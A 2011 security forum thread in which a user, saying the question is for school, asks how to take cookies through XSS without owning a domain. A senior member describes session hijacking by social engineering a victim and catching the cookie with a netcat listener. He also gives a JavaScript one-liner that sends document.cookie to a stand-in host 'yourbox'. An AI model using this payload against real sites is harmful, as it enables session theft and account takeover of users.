
XSS snatching cookie without domain


bigapple

Newbie

Posts: 8

Joined: Thu Aug 18, 2011 12:07 pm

Post Thu Aug 18, 2011 1:39 pm

XSS snatching cookie without domain

Okay, I'm new to this site so I'm hoping my question doesn't come off as malicious. This is for school, so I'm not trying to do anything evil. Anyway, I was wondering if it's possible to snatch a cookie using XSS and deliver it to an attacker without sending it to an attacker-controlled domain. Like if an attacker didn't own a domain, or if the domain was blocked, is there any other method or trick that can be used to receive the cookie? I can code in Javascript relatively well, so you can talk about Javascript functions, methods etc. And that's encouraged because I'm interested in the coding perspective, so please give me your ideas. Thanks.  ;D

cd1zz

Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Aug 18, 2011 2:45 pm

Re: XSS snatching cookie without domain

3 assumptions: 1) the site uses session cookies and 2) there is an xss vulnerability in the application and 3) you can SE someone to open your link or get it to them somehow.

With that said, yes. You can basically take the cookie from the site using javascript and send it to a listener somewhere else. A simple remote netcat listener would do to capture your stolen cookie. With the data posted to your screen you'd just locate the cookie and copy it. Then, use a proxy to intercept your own web communications to inject your stolen cookie and whatever else you need. Does that answer your question?

bigapple

Newbie

Posts: 8

Joined: Thu Aug 18, 2011 12:07 pm

Post Thu Aug 18, 2011 4:31 pm

Re: XSS snatching cookie without domain

I thought Javascript code was limited to client-side browser stuff. Can Javascript even make a TCP connection? If it can, then yes that would answer my question very nicely. But I was thinking more along the lines of something like emailing the contents of the cookie, or some other web-related method of delivering it but that will work well. Thanks.

cd1zz

Recruiters

Posts: 566

Joined: Sun Oct 03, 2010 9:01 pm

Post Thu Aug 18, 2011 4:45 pm

Re: XSS snatching cookie without domain

You could use something like document.location.replace("http://yourbox/"+document.cookie+"pagelocation:"+document.location)

which would connect to "yourbox" where your netcat listener is and send you the cookie with the url query string.....

MaXe has a nice example here, not the same thing but it might get your wheels turning:  http://www.exploit-db.com/vbseo-from-xs ... php-shell/

bigapple

Newbie

Posts: 8

Joined: Thu Aug 18, 2011 12:07 pm

Post Fri Aug 19, 2011 6:33 am

Re: XSS snatching cookie without domain

Okay, thanks. That answers my question nicely  ;D
